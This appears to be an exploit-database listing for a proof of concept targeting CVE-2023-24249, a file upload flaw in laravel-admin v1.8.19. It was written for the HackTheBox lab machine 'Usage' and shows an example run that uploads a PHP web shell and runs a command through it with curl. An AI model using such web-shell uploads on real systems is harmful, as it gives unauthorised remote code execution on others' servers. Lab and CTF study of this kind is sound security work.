Exploit for Unrestricted Upload of File with Dangerous Type in Laravel-Admin CVE-2023-24249

Name: Exploit for Unrestricted Upload of File with Dangerous Type in Laravel-Admin CVE-2023-24249
Rating: 5 (149 reviews)

2025-06-21 | CVSS 7.2

## https://sploitus.com/exploit?id=9F321400-8170-5842-9CB6-3E0FE6394807
# CVE-2023-24249 PoC
[CVE-2023-24249](https://nvd.nist.gov/vuln/detail/CVE-2023-24249) is an arbitrary file upload vulnerability in laravel-admin v1.8.19. This proof of concept exploits the vulnerability to upload a web shell.

The exploit was written to use against the HackTheBox easy machine [Usage](https://app.hackthebox.com/machines/Usage).

# Example
```
python3 CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php

curl http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php?c=id                                            
uid=1000(dash) gid=1000(dash) groups=1000(dash)
```